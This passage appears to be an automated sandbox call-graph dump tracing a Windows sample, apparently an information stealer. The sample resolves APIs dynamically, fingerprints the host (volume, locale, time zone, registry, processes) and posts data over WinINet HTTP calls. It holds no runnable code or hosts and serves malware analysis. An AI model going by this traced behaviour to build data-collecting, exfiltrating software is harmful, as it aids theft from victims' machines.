fb3fe6 14169->14170 14171 fb45c0 2 API calls 14170->14171 14172 fb3fff 14171->14172 14173 fb45c0 2 API calls 14172->14173 14174 fb4018 14173->14174 14175 fb45c0 2 API calls 14174->14175 14176 fb4031 14175->14176 14177 fb45c0 2 API calls 14176->14177 14178 fb404a 14177->14178 14179 fb45c0 2 API calls 14178->14179 14180 fb4063 14179->14180 14181 fb45c0 2 API calls 14180->14181 14182 fb407c 14181->14182 14183 fb45c0 2 API calls 14182->14183 14184 fb4095 14183->14184 14185 fb45c0 2 API calls 14184->14185 14186 fb40ae 14185->14186 14187 fb45c0 2 API calls 14186->14187 14188 fb40c7 14187->14188 14189 fb45c0 2 API calls 14188->14189 14190 fb40e0 14189->14190 14191 fb45c0 2 API calls 14190->14191 14192 fb40f9 14191->14192 14193 fb45c0 2 API calls 14192->14193 14194 fb4112 14193->14194 14195 fb45c0 2 API calls 14194->14195 14196 fb412b 14195->14196 14197 fb45c0 2 API calls 14196->14197 14198 fb4144 14197->14198 14199 fb45c0 2 API calls 14198->14199 14200 fb415d 14199->14200 14201 fb45c0 2 API calls 14200->14201 14202 fb4176 14201->14202 14203 fb45c0 2 API calls 14202->14203 14204 fb418f 14203->14204 14205 fb45c0 2 API calls 14204->14205 14206 fb41a8 14205->14206 14207 fb45c0 2 API calls 14206->14207 14208 fb41c1 14207->14208 14209 fb45c0 2 API calls 14208->14209 14210 fb41da 14209->14210 14211 fb45c0 2 API calls 14210->14211 14212 fb41f3 14211->14212 14213 fb45c0 2 API calls 14212->14213 14214 fb420c 14213->14214 14215 fb45c0 2 API calls 14214->14215 14216 fb4225 14215->14216 14217 fb45c0 2 API calls 14216->14217 14218 fb423e 14217->14218 14219 fb45c0 2 API calls 14218->14219 14220 fb4257 14219->14220 14221 fb45c0 2 API calls 14220->14221 14222 fb4270 14221->14222 14223 fb45c0 2 API calls 14222->14223 14224 fb4289 14223->14224 14225 fb45c0 2 API calls 14224->14225 14226 fb42a2 14225->14226 14227 fb45c0 2 API calls 14226->14227 14228 fb42bb 14227->14228 14229 fb45c0 2 API calls 14228->14229 14230 fb42d4 14229->14230 14231 fb45c0 2 API calls 14230->14231 14232 fb42ed 14231->14232 14233 fb45c0 2 API calls 14232->14233 14234 fb4306 14233->14234 14235 fb45c0 2 API calls 14234->14235 14236 fb431f 14235->14236 14237 fb45c0 2 API calls 14236->14237 14238 fb4338 14237->14238 14239 fb45c0 2 API calls 14238->14239 14240 fb4351 14239->14240 14241 fb45c0 2 API calls 14240->14241 14242 fb436a 14241->14242 14243 fb45c0 2 API calls 14242->14243 14244 fb4383 14243->14244 14245 fb45c0 2 API calls 14244->14245 14246 fb439c 14245->14246 14247 fb45c0 2 API calls 14246->14247 14248 fb43b5 14247->14248 14249 fb45c0 2 API calls 14248->14249 14250 fb43ce 14249->14250 14251 fb45c0 2 API calls 14250->14251 14252 fb43e7 14251->14252 14253 fb45c0 2 API calls 14252->14253 14254 fb4400 14253->14254 14255 fb45c0 2 API calls 14254->14255 14256 fb4419 14255->14256 14257 fb45c0 2 API calls 14256->14257 14258 fb4432 14257->14258 14259 fb45c0 2 API calls 14258->14259 14260 fb444b 14259->14260 14261 fb45c0 2 API calls 14260->14261 14262 fb4464 14261->14262 14263 fb45c0 2 API calls 14262->14263 14264 fb447d 14263->14264 14265 fb45c0 2 API calls 14264->14265 14266 fb4496 14265->14266 14267 fb45c0 2 API calls 14266->14267 14268 fb44af 14267->14268 14269 fb45c0 2 API calls 14268->14269 14270 fb44c8 14269->14270 14271 fb45c0 2 API calls 14270->14271 14272 fb44e1 14271->14272 14273 fb45c0 2 API calls 14272->14273 14274 fb44fa 14273->14274 14275 fb45c0 2 API calls 14274->14275 14276 fb4513 14275->14276 14277 fb45c0 2 API calls 14276->14277 14278 fb452c 14277->14278 14279 fb45c0 2 API calls 14278->14279 14280 fb4545 14279->14280 14281 fb45c0 2 API calls 14280->14281 14282 fb455e 14281->14282 14283 fb45c0 2 API calls 14282->14283 14284 fb4577 14283->14284 14285 fb45c0 2 API calls 14284->14285 14286 fb4590 14285->14286 14287 fb45c0 2 API calls 14286->14287 14288 fb45a9 14287->14288 14289 fc9c10 14288->14289 14290 fca036 8 API calls 14289->14290 14291 fc9c20 43 API calls 14289->14291 14292 fca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14290->14292 14293 fca146 14290->14293 14291->14290 14292->14293 14294 fca216 14293->14294 14295 fca153 8 API calls 14293->14295 14296 fca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14294->14296 14297 fca298 14294->14297 14295->14294 14296->14297 14298 fca2a5 6 API calls 14297->14298 14299 fca337 14297->14299 14298->14299 14300 fca41f 14299->14300 14301 fca344 9 API calls 14299->14301 14302 fca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14300->14302 14303 fca4a2 14300->14303 14301->14300 14302->14303 14304 fca4dc 14303->14304 14305 fca4ab GetProcAddress GetProcAddress 14303->14305 14306 fca515 14304->14306 14307 fca4e5 GetProcAddress GetProcAddress 14304->14307 14305->14304 14308 fca612 14306->14308 14309 fca522 10 API calls 14306->14309 14307->14306 14310 fca67d 14308->14310 14311 fca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14308->14311 14309->14308 14312 fca69e 14310->14312 14313 fca686 GetProcAddress 14310->14313 14311->14310 14314 fc5ca3 14312->14314 14315 fca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14312->14315 14313->14312 14316 fb1590 14314->14316 14315->14314 15437 fb1670 14316->15437 14319 fca7a0 lstrcpy 14320 fb15b5 14319->14320 14321 fca7a0 lstrcpy 14320->14321 14322 fb15c7 14321->14322 14323 fca7a0 lstrcpy 14322->14323 14324 fb15d9 14323->14324 14325 fca7a0 lstrcpy 14324->14325 14326 fb1663 14325->14326 14327 fc5510 14326->14327 14328 fc5521 14327->14328 14329 fca820 2 API calls 14328->14329 14330 fc552e 14329->14330 14331 fca820 2 API calls 14330->14331 14332 fc553b 14331->14332 14333 fca820 2 API calls 14332->14333 14334 fc5548 14333->14334 14335 fca740 lstrcpy 14334->14335 14336 fc5555 14335->14336 14337 fca740 lstrcpy 14336->14337 14338 fc5562 14337->14338 14339 fca740 lstrcpy 14338->14339 14340 fc556f 14339->14340 14341 fca740 lstrcpy 14340->14341 14352 fc557c 14341->14352 14342 fc5643 StrCmpCA 14342->14352 14343 fc56a0 StrCmpCA 14344 fc57dc 14343->14344 14343->14352 14345 fca8a0 lstrcpy 14344->14345 14347 fc57e8 14345->14347 14346 fb1590 lstrcpy 14346->14352 14348 fca820 2 API calls 14347->14348 14349 fc57f6 14348->14349 14353 fca820 2 API calls 14349->14353 14350 fc5856 StrCmpCA 14350->14352 14354 fc5991 14350->14354 14351 fca7a0 lstrcpy 14351->14352 14352->14342 14352->14343 14352->14346 14352->14350 14352->14351 14359 fca820 lstrlen lstrcpy 14352->14359 14361 fc51f0 20 API calls 14352->14361 14363 fc5a0b StrCmpCA 14352->14363 14366 fca740 lstrcpy 14352->14366 14369 fca8a0 lstrcpy 14352->14369 14375 fc52c0 25 API calls 14352->14375 14378 fc578a StrCmpCA 14352->14378 14380 fc593f StrCmpCA 14352->14380 14356 fc5805 14353->14356 14355 fca8a0 lstrcpy 14354->14355 14357 fc599d 14355->14357 14358 fb1670 lstrcpy 14356->14358 14360 fca820 2 API calls 14357->14360 14381 fc5811 14358->14381 14359->14352 14362 fc59ab 14360->14362 14361->14352 14367 fca820 2 API calls 14362->14367 14364 fc5a28 14363->14364 14365 fc5a16 Sleep 14363->14365 14368 fca8a0 lstrcpy 14364->14368 14365->14352 14366->14352 14370 fc59ba 14367->14370 14371 fc5a34 14368->14371 14369->14352 14372 fb1670 lstrcpy 14370->14372 14373 fca820 2 API calls 14371->14373 14372->14381 14374 fc5a43 14373->14374 14376 fca820 2 API calls 14374->14376 14375->14352 14377 fc5a52 14376->14377 14379 fb1670 lstrcpy 14377->14379 14378->14352 14379->14381 14380->14352 14381->13434 14383 fc754c 14382->14383 14384 fc7553 GetVolumeInformationA 14382->14384 14383->14384 14388 fc7591 14384->14388 14385 fc75fc GetProcessHeap RtlAllocateHeap 14386 fc7628 wsprintfA 14385->14386 14387 fc7619 14385->14387 14390 fca740 lstrcpy 14386->14390 14389 fca740 lstrcpy 14387->14389 14388->14385 14391 fc5da7 14389->14391 14390->14391 14391->13455 14393 fca7a0 lstrcpy 14392->14393 14394 fb4899 14393->14394 15446 fb47b0 14394->15446 14396 fb48a5 14397 fca740 lstrcpy 14396->14397 14398 fb48d7 14397->14398 14399 fca740 lstrcpy 14398->14399 14400 fb48e4 14399->14400 14401 fca740 lstrcpy 14400->14401 14402 fb48f1 14401->14402 14403 fca740 lstrcpy 14402->14403 14404 fb48fe 14403->14404 14405 fca740 lstrcpy 14404->14405 14406 fb490b InternetOpenA StrCmpCA 14405->14406 14407 fb4944 14406->14407 14408 fb4ecb InternetCloseHandle 14407->14408 15452 fc8b60 14407->15452 14410 fb4ee8 14408->14410 15467 fb9ac0 CryptStringToBinaryA 14410->15467 14411 fb4963 15460 fca920 14411->15460 14414 fb4976 14416 fca8a0 lstrcpy 14414->14416 14421 fb497f 14416->14421 14417 fca820 2 API calls 14418 fb4f05 14417->14418 14420 fca9b0 4 API calls 14418->14420 14419 fb4f27 ctype 14423 fca7a0 lstrcpy 14419->14423 14422 fb4f1b 14420->14422 14425 fca9b0 4 API calls 14421->14425 14424 fca8a0 lstrcpy 14422->14424 14436 fb4f57 14423->14436 14424->14419 14426 fb49a9 14425->14426 14427 fca8a0 lstrcpy 14426->14427 14428 fb49b2 14427->14428 14429 fca9b0 4 API calls 14428->14429 14430 fb49d1 14429->14430 14431 fca8a0 lstrcpy 14430->14431 14432 fb49da 14431->14432 14433 fca920 3 API calls 14432->14433 14434 fb49f8 14433->14434 14435 fca8a0 lstrcpy 14434->14435 14437 fb4a01 14435->14437 14436->13458 14438 fca9b0 4 API calls 14437->14438 14439 fb4a20 14438->14439 14440 fca8a0 lstrcpy 14439->14440 14441 fb4a29 14440->14441 14442 fca9b0 4 API calls 14441->14442 14443 fb4a48 14442->14443 14444 fca8a0 lstrcpy 14443->14444 14445 fb4a51 14444->14445 14446 fca9b0 4 API calls 14445->14446 14447 fb4a7d 14446->14447 14448 fca920 3 API calls 14447->14448 14449 fb4a84 14448->14449 14450 fca8a0 lstrcpy 14449->14450 14451 fb4a8d 14450->14451 14452 fb4aa3 InternetConnectA 14451->14452 14452->14408 14453 fb4ad3 HttpOpenRequestA 14452->14453 14455 fb4b28 14453->14455 14456 fb4ebe InternetCloseHandle 14453->14456 14457 fca9b0 4 API calls 14455->14457 14456->14408 14458 fb4b3c 14457->14458 14459 fca8a0 lstrcpy 14458->14459 14460 fb4b45 14459->14460 14461 fca920 3 API calls 14460->14461 14462 fb4b63 14461->14462 14463 fca8a0 lstrcpy 14462->14463 14464 fb4b6c 14463->14464 14465 fca9b0 4 API calls 14464->14465 14466 fb4b8b 14465->14466 14467 fca8a0 lstrcpy 14466->14467 14468 fb4b94 14467->14468 14469 fca9b0 4 API calls 14468->14469 14470 fb4bb5 14469->14470 14471 fca8a0 lstrcpy 14470->14471 14472 fb4bbe 14471->14472 14473 fca9b0 4 API calls 14472->14473 14474 fb4bde 14473->14474 14475 fca8a0 lstrcpy 14474->14475 14476 fb4be7 14475->14476 14477 fca9b0 4 API calls 14476->14477 14478 fb4c06 14477->14478 14479 fca8a0 lstrcpy 14478->14479 14480 fb4c0f 14479->14480 14481 fca920 3 API calls 14480->14481 14482 fb4c2d 14481->14482 14483 fca8a0 lstrcpy 14482->14483 14484 fb4c36 14483->14484 14485 fca9b0 4 API calls 14484->14485 14486 fb4c55 14485->14486 14487 fca8a0 lstrcpy 14486->14487 14488 fb4c5e 14487->14488 14489 fca9b0 4 API calls 14488->14489 14490 fb4c7d 14489->14490 14491 fca8a0 lstrcpy 14490->14491 14492 fb4c86 14491->14492 14493 fca920 3 API calls 14492->14493 14494 fb4ca4 14493->14494 14495 fca8a0 lstrcpy 14494->14495 14496 fb4cad 14495->14496 14497 fca9b0 4 API calls 14496->14497 14498 fb4ccc 14497->14498 14499 fca8a0 lstrcpy 14498->14499 14500 fb4cd5 14499->14500 14501 fca9b0 4 API calls 14500->14501 14502 fb4cf6 14501->14502 14503 fca8a0 lstrcpy 14502->14503 14504 fb4cff 14503->14504 14505 fca9b0 4 API calls 14504->14505 14506 fb4d1f 14505->14506 14507 fca8a0 lstrcpy 14506->14507 14508 fb4d28 14507->14508 14509 fca9b0 4 API calls 14508->14509 14510 fb4d47 14509->14510 14511 fca8a0 lstrcpy 14510->14511 14512 fb4d50 14511->14512 14513 fca920 3 API calls 14512->14513 14514 fb4d6e 14513->14514 14515 fca8a0 lstrcpy 14514->14515 14516 fb4d77 14515->14516 14517 fca740 lstrcpy 14516->14517 14518 fb4d92 14517->14518 14519 fca920 3 API calls 14518->14519 14520 fb4db3 14519->14520 14521 fca920 3 API calls 14520->14521 14522 fb4dba 14521->14522 14523 fca8a0 lstrcpy 14522->14523 14524 fb4dc6 14523->14524 14525 fb4de7 lstrlen 14524->14525 14526 fb4dfa 14525->14526 14527 fb4e03 lstrlen 14526->14527 15466 fcaad0 14527->15466 14529 fb4e13 HttpSendRequestA 14530 fb4e32 InternetReadFile 14529->14530 14531 fb4e67 InternetCloseHandle 14530->14531 14536 fb4e5e 14530->14536 14533 fca800 14531->14533 14533->14456 14534 fca9b0 4 API calls 14534->14536 14535 fca8a0 lstrcpy 14535->14536 14536->14530 14536->14531 14536->14534 14536->14535 15473 fcaad0 14537->15473 14539 fc17c4 StrCmpCA 14540 fc17cf ExitProcess 14539->14540 14544 fc17d7 14539->14544 14541 fc19c2 14541->13460 14542 fc185d StrCmpCA 14542->14544 14543 fc187f StrCmpCA 14543->14544 14544->14541 14544->14542 14544->14543 14545 fc1970 StrCmpCA 14544->14545 14546 fc18f1 StrCmpCA 14544->14546 14547 fc1951 StrCmpCA 14544->14547 14548 fc1932 StrCmpCA 14544->14548 14549 fc1913 StrCmpCA 14544->14549 14550 fc18ad StrCmpCA 14544->14550 14551 fc18cf StrCmpCA 14544->14551 14552 fca820 lstrlen lstrcpy 14544->14552 14545->14544 14546->14544 14547->14544 14548->14544 14549->14544 14550->14544 14551->14544 14552->14544 14554 fca7a0 lstrcpy 14553->14554 14555 fb5979 14554->14555 14556 fb47b0 2 API calls 14555->14556 14557 fb5985 14556->14557 14558 fca740 lstrcpy 14557->14558 14559 fb59ba 14558->14559 14560 fca740 lstrcpy 14559->14560 14561 fb59c7 14560->14561 14562 fca740 lstrcpy 14561->14562 14563 fb59d4 14562->14563 14564 fca740 lstrcpy 14563->14564 14565 fb59e1 14564->14565 14566 fca740 lstrcpy 14565->14566 14567 fb59ee InternetOpenA StrCmpCA 14566->14567 14568 fb5a1d 14567->14568 14569 fb5fc3 InternetCloseHandle 14568->14569 14570 fc8b60 3 API calls 14568->14570 14571 fb5fe0 14569->14571 14572 fb5a3c 14570->14572 14574 fb9ac0 4 API calls 14571->14574 14573 fca920 3 API calls 14572->14573 14575 fb5a4f 14573->14575 14576 fb5fe6 14574->14576 14577 fca8a0 lstrcpy 14575->14577 14578 fca820 2 API calls 14576->14578 14580 fb601f ctype 14576->14580 14582 fb5a58 14577->14582 14579 fb5ffd 14578->14579 14581 fca9b0 4 API calls 14579->14581 14584 fca7a0 lstrcpy 14580->14584 14583 fb6013 14581->14583 14586 fca9b0 4 API calls 14582->14586 14585 fca8a0 lstrcpy 14583->14585 14594 fb604f 14584->14594 14585->14580 14587 fb5a82 14586->14587 14588 fca8a0 lstrcpy 14587->14588 14589 fb5a8b 14588->14589 14590 fca9b0 4 API calls 14589->14590 14591 fb5aaa 14590->14591 14592 fca8a0 lstrcpy 14591->14592 14593 fb5ab3 14592->14593 14595 fca920 3 API calls 14593->14595 14594->13466 14596 fb5ad1 14595->14596 14597 fca8a0 lstrcpy 14596->14597 14598 fb5ada 14597->14598 14599 fca9b0 4 API calls 14598->14599 14600 fb5af9 14599->14600 14601 fca8a0 lstrcpy 14600->14601 14602 fb5b02 14601->14602 14603 fca9b0 4 API calls 14602->14603 14604 fb5b21 14603->14604 14605 fca8a0 lstrcpy 14604->14605 14606 fb5b2a 14605->14606 14607 fca9b0 4 API calls 14606->14607 14608 fb5b56 14607->14608 14609 fca920 3 API calls 14608->14609 14610 fb5b5d 14609->14610 14611 fca8a0 lstrcpy 14610->14611 14612 fb5b66 14611->14612 14613 fb5b7c InternetConnectA 14612->14613 14613->14569 14614 fb5bac HttpOpenRequestA 14613->14614 14616 fb5c0b 14614->14616 14617 fb5fb6 InternetCloseHandle 14614->14617 14618 fca9b0 4 API calls 14616->14618 14617->14569 14619 fb5c1f 14618->14619 14620 fca8a0 lstrcpy 14619->14620 14621 fb5c28 14620->14621 14622 fca920 3 API calls 14621->14622 14623 fb5c46 14622->14623 14624 fca8a0 lstrcpy 14623->14624 14625 fb5c4f 14624->14625 14626 fca9b0 4 API calls 14625->14626 14627 fb5c6e 14626->14627 14628 fca8a0 lstrcpy 14627->14628 14629 fb5c77 14628->14629 14630 fca9b0 4 API calls 14629->14630 14631 fb5c98 14630->14631 14632 fca8a0 lstrcpy 14631->14632 14633 fb5ca1 14632->14633 14634 fca9b0 4 API calls 14633->14634 14635 fb5cc1 14634->14635 14636 fca8a0 lstrcpy 14635->14636 14637 fb5cca 14636->14637 14638 fca9b0 4 API calls 14637->14638 14639 fb5ce9 14638->14639 14640 fca8a0 lstrcpy 14639->14640 14641 fb5cf2 14640->14641 14642 fca920 3 API calls 14641->14642 14643 fb5d10 14642->14643 14644 fca8a0 lstrcpy 14643->14644 14645 fb5d19 14644->14645 14646 fca9b0 4 API calls 14645->14646 14647 fb5d38 14646->14647 14648 fca8a0 lstrcpy 14647->14648 14649 fb5d41 14648->14649 14650 fca9b0 4 API calls 14649->14650 14651 fb5d60 14650->14651 14652 fca8a0 lstrcpy 14651->14652 14653 fb5d69 14652->14653 14654 fca920 3 API calls 14653->14654 14655 fb5d87 14654->14655 14656 fca8a0 lstrcpy 14655->14656 14657 fb5d90 14656->14657 14658 fca9b0 4 API calls 14657->14658 14659 fb5daf 14658->14659 14660 fca8a0 lstrcpy 14659->14660 14661 fb5db8 14660->14661 14662 fca9b0 4 API calls 14661->14662 14663 fb5dd9 14662->14663 14664 fca8a0 lstrcpy 14663->14664 14665 fb5de2 14664->14665 14666 fca9b0 4 API calls 14665->14666 14667 fb5e02 14666->14667 14668 fca8a0 lstrcpy 14667->14668 14669 fb5e0b 14668->14669 14670 fca9b0 4 API calls 14669->14670 14671 fb5e2a 14670->14671 14672 fca8a0 lstrcpy 14671->14672 14673 fb5e33 14672->14673 14674 fca920 3 API calls 14673->14674 14675 fb5e54 14674->14675 14676 fca8a0 lstrcpy 14675->14676 14677 fb5e5d 14676->14677 14678 fb5e70 lstrlen 14677->14678 15474 fcaad0 14678->15474 14680 fb5e81 lstrlen GetProcessHeap RtlAllocateHeap 15475 fcaad0 14680->15475 14682 fb5eae lstrlen 14683 fb5ebe 14682->14683 14684 fb5ed7 lstrlen 14683->14684 14685 fb5ee7 14684->14685 14686 fb5ef0 lstrlen 14685->14686 14687 fb5f03 14686->14687 14688 fb5f1a lstrlen 14687->14688 15476 fcaad0 14688->15476 14690 fb5f2a HttpSendRequestA 14691 fb5f35 InternetReadFile 14690->14691 14692 fb5f6a InternetCloseHandle 14691->14692 14696 fb5f61 14691->14696 14692->14617 14694 fca9b0 4 API calls 14694->14696 14695 fca8a0 lstrcpy 14695->14696 14696->14691 14696->14692 14696->14694 14696->14695 14698 fc1077 14697->14698 14699 fc1151 14698->14699 14700 fca820 lstrlen lstrcpy 14698->14700 14699->13468 14700->14698 14706 fc0db7 14701->14706 14702 fc0f17 14702->13476 14703 fc0ea4 StrCmpCA 14703->14706 14704 fc0e27 StrCmpCA 14704->14706 14705 fc0e67 StrCmpCA 14705->14706 14706->14702 14706->14703 14706->14704 14706->14705 14707 fca820 lstrlen lstrcpy 14706->14707 14707->14706 14709 fc0f67 14708->14709 14710 fc1044 14709->14710 14711 fc0fb2 StrCmpCA 14709->14711 14712 fca820 lstrlen lstrcpy 14709->14712 14710->13484 14711->14709 14712->14709 14714 fca740 lstrcpy 14713->14714 14715 fc1a26 14714->14715 14716 fca9b0 4 API calls 14715->14716 14717 fc1a37 14716->14717 14718 fca8a0 lstrcpy 14717->14718 14719 fc1a40 14718->14719 14720 fca9b0 4 API calls 14719->14720 14721 fc1a5b 14720->14721 14722 fca8a0 lstrcpy 14721->14722 14723 fc1a64 14722->14723 14724 fca9b0 4 API calls 14723->14724 14725 fc1a7d 14724->14725 14726 fca8a0 lstrcpy 14725->14726 14727 fc1a86 14726->14727 14728 fca9b0 4 API calls 14727->14728 14729 fc1aa1 14728->14729 14730 fca8a0 lstrcpy 14729->14730 14731 fc1aaa 14730->14731 14732 fca9b0 4 API calls 14731->14732 14733 fc1ac3 14732->14733 14734 fca8a0 lstrcpy 14733->14734 14735 fc1acc 14734->14735 14736 fca9b0 4 API calls 14735->14736 14737 fc1ae7 14736->14737 14738 fca8a0 lstrcpy 14737->14738 14739 fc1af0 14738->14739 14740 fca9b0 4 API calls 14739->14740 14741 fc1b09 14740->14741 14742 fca8a0 lstrcpy 14741->14742 14743 fc1b12 14742->14743 14744 fca9b0 4 API calls 14743->14744 14745 fc1b2d 14744->14745 14746 fca8a0 lstrcpy 14745->14746 14747 fc1b36 14746->14747 14748 fca9b0 4 API calls 14747->14748 14749 fc1b4f 14748->14749 14750 fca8a0 lstrcpy 14749->14750 14751 fc1b58 14750->14751 14752 fca9b0 4 API calls 14751->14752 14753 fc1b76 14752->14753 14754 fca8a0 lstrcpy 14753->14754 14755 fc1b7f 14754->14755 14756 fc7500 6 API calls 14755->14756 14757 fc1b96 14756->14757 14758 fca920 3 API calls 14757->14758 14759 fc1ba9 14758->14759 14760 fca8a0 lstrcpy 14759->14760 14761 fc1bb2 14760->14761 14762 fca9b0 4 API calls 14761->14762 14763 fc1bdc 14762->14763 14764 fca8a0 lstrcpy 14763->14764 14765 fc1be5 14764->14765 14766 fca9b0 4 API calls 14765->14766 14767 fc1c05 14766->14767 14768 fca8a0 lstrcpy 14767->14768 14769 fc1c0e 14768->14769 15477 fc7690 GetProcessHeap RtlAllocateHeap 14769->15477 14772 fca9b0 4 API calls 14773 fc1c2e 14772->14773 14774 fca8a0 lstrcpy 14773->14774 14775 fc1c37 14774->14775 14776 fca9b0 4 API calls 14775->14776 14777 fc1c56 14776->14777 14778 fca8a0 lstrcpy 14777->14778 14779 fc1c5f 14778->14779 14780 fca9b0 4 API calls 14779->14780 14781 fc1c80 14780->14781 14782 fca8a0 lstrcpy 14781->14782 14783 fc1c89 14782->14783 15484 fc77c0 GetCurrentProcess IsWow64Process 14783->15484 14786 fca9b0 4 API calls 14787 fc1ca9 14786->14787 14788 fca8a0 lstrcpy 14787->14788 14789 fc1cb2 14788->14789 14790 fca9b0 4 API calls 14789->14790 14791 fc1cd1 14790->14791 14792 fca8a0 lstrcpy 14791->14792 14793 fc1cda 14792->14793 14794 fca9b0 4 API calls 14793->14794 14795 fc1cfb 14794->14795 14796 fca8a0 lstrcpy 14795->14796 14797 fc1d04 14796->14797 14798 fc7850 3 API calls 14797->14798 14799 fc1d14 14798->14799 14800 fca9b0 4 API calls 14799->14800 14801 fc1d24 14800->14801 14802 fca8a0 lstrcpy 14801->14802 14803 fc1d2d 14802->14803 14804 fca9b0 4 API calls 14803->14804 14805 fc1d4c 14804->14805 14806 fca8a0 lstrcpy 14805->14806 14807 fc1d55 14806->14807 14808 fca9b0 4 API calls 14807->14808 14809 fc1d75 14808->14809 14810 fca8a0 lstrcpy 14809->14810 14811 fc1d7e 14810->14811 14812 fc78e0 3 API calls 14811->14812 14813 fc1d8e 14812->14813 14814 fca9b0 4 API calls 14813->14814 14815 fc1d9e 14814->14815 14816 fca8a0 lstrcpy 14815->14816 14817 fc1da7 14816->14817 14818 fca9b0 4 API calls 14817->14818 14819 fc1dc6 14818->14819 14820 fca8a0 lstrcpy 14819->14820 14821 fc1dcf 14820->14821 14822 fca9b0 4 API calls 14821->14822 14823 fc1df0 14822->14823 14824 fca8a0 lstrcpy 14823->14824 14825 fc1df9 14824->14825 15486 fc7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14825->15486 14828 fca9b0 4 API calls 14829 fc1e19 14828->14829 14830 fca8a0 lstrcpy 14829->14830 14831 fc1e22 14830->14831 14832 fca9b0 4 API calls 14831->14832 14833 fc1e41 14832->14833 14834 fca8a0 lstrcpy 14833->14834 14835 fc1e4a 14834->14835 14836 fca9b0 4 API calls 14835->14836 14837 fc1e6b 14836->14837 14838 fca8a0 lstrcpy 14837->14838 14839 fc1e74 14838->14839 15488 fc7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14839->15488 14842 fca9b0 4 API calls 14843 fc1e94 14842->14843 14844 fca8a0 lstrcpy 14843->14844 14845 fc1e9d 14844->14845 14846 fca9b0 4 API calls 14845->14846 14847 fc1ebc 14846->14847 14848 fca8a0 lstrcpy 14847->14848 14849 fc1ec5 14848->14849 14850 fca9b0 4 API calls 14849->14850 14851 fc1ee5 14850->14851 14852 fca8a0 lstrcpy 14851->14852 14853 fc1eee 14852->14853 15491 fc7b00 GetUserDefaultLocaleName 14853->15491 14856 fca9b0 4 API calls 14857 fc1f0e 14856->14857 14858 fca8a0 lstrcpy 14857->14858 14859 fc1f17 14858->14859 14860 fca9b0 4 API calls 14859->14860 14861 fc1f36 14860->14861 14862 fca8a0 lstrcpy 14861->14862 14863 fc1f3f 14862->14863 14864 fca9b0 4 API calls 14863->14864 14865 fc1f60 14864->14865 14866 fca8a0 lstrcpy 14865->14866 14867 fc1f69 14866->14867 15495 fc7b90 14867->15495 14869 fc1f80 14870 fca920 3 API calls 14869->14870 14871 fc1f93 14870->14871 14872 fca8a0 lstrcpy 14871->14872 14873 fc1f9c 14872->14873 14874 fca9b0 4 API calls 14873->14874 14875 fc1fc6 14874->14875 14876 fca8a0 lstrcpy 14875->14876 14877 fc1fcf 14876->14877 14878 fca9b0 4 API calls 14877->14878 14879 fc1fef 14878->14879 14880 fca8a0 lstrcpy 14879->14880 14881 fc1ff8 14880->14881 15507 fc7d80 GetSystemPowerStatus 14881->15507 14884 fca9b0 4 API calls 14885 fc2018 14884->14885 14886 fca8a0 lstrcpy 14885->14886 14887 fc2021 14886->14887 14888 fca9b0 4 API calls 14887->14888 14889 fc2040 14888->14889 14890 fca8a0 lstrcpy 14889->14890 14891 fc2049 14890->14891 14892 fca9b0 4 API calls 14891->14892 14893 fc206a 14892->14893 14894 fca8a0 lstrcpy 14893->14894 14895 fc2073 14894->14895 14896 fc207e GetCurrentProcessId 14895->14896 15509 fc9470 OpenProcess 14896->15509 14899 fca920 3 API calls 14900 fc20a4 14899->14900 14901 fca8a0 lstrcpy 14900->14901 14902 fc20ad 14901->14902 14903 fca9b0 4 API calls 14902->14903 14904 fc20d7 14903->14904 14905 fca8a0 lstrcpy 14904->14905 14906 fc20e0 14905->14906 14907 fca9b0 4 API calls 14906->14907 14908 fc2100 14907->14908 14909 fca8a0 lstrcpy 14908->14909 14910 fc2109 14909->14910 15514 fc7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14910->15514 14913 fca9b0 4 API calls 14914 fc2129 14913->14914 14915 fca8a0 lstrcpy 14914->14915 14916 fc2132 14915->14916 14917 fca9b0 4 API calls 14916->14917 14918 fc2151 14917->14918 14919 fca8a0 lstrcpy 14918->14919 14920 fc215a 14919->14920 14921 fca9b0 4 API calls 14920->14921 14922 fc217b 14921->14922 14923 fca8a0 lstrcpy 14922->14923 14924 fc2184 14923->14924 15518 fc7f60 14924->15518 14927 fca9b0 4 API calls 14928 fc21a4 14927->14928 14929 fca8a0 lstrcpy 14928->14929 14930 fc21ad 14929->14930 14931 fca9b0 4 API calls 14930->14931 14932 fc21cc 14931->14932 14933 fca8a0 lstrcpy 14932->14933 14934 fc21d5 14933->14934 14935 fca9b0 4 API calls 14934->14935 14936 fc21f6 14935->14936 14937 fca8a0 lstrcpy 14936->14937 14938 fc21ff 14937->14938 15531 fc7ed0 GetSystemInfo wsprintfA 14938->15531 14941 fca9b0 4 API calls 14942 fc221f 14941->14942 14943 fca8a0 lstrcpy 14942->14943 14944 fc2228 14943->14944 14945 fca9b0 4 API calls 14944->14945 14946 fc2247 14945->14946 14947 fca8a0 lstrcpy 14946->14947 14948 fc2250 14947->14948 14949 fca9b0 4 API calls 14948->14949 14950 fc2270 14949->14950 14951 fca8a0 lstrcpy 14950->14951 14952 fc2279 14951->14952 15533 fc8100 GetProcessHeap RtlAllocateHeap 14952->15533 14955 fca9b0 4 API calls 14956 fc2299 14955->14956 14957 fca8a0 lstrcpy 14956->14957 14958 fc22a2 14957->14958 14959 fca9b0 4 API calls 14958->14959 14960 fc22c1 14959->14960 14961 fca8a0 lstrcpy 14960->14961 14962 fc22ca 14961->14962 14963 fca9b0 4 API calls 14962->14963 14964 fc22eb 14963->14964 14965 fca8a0 lstrcpy 14964->14965 14966 fc22f4 14965->14966 15539 fc87c0 14966->15539 14969 fca920 3 API calls 14970 fc231e 14969->14970 14971 fca8a0 lstrcpy 14970->14971 14972 fc2327 14971->14972 14973 fca9b0 4 API calls 14972->14973 14974 fc2351 14973->14974 14975 fca8a0 lstrcpy 14974->14975 14976 fc235a 14975->14976 14977 fca9b0 4 API calls 14976->14977 14978 fc237a 14977->14978 14979 fca8a0 lstrcpy 14978->14979 14980 fc2383 14979->14980 14981 fca9b0 4 API calls 14980->14981 14982 fc23a2 14981->14982 14983 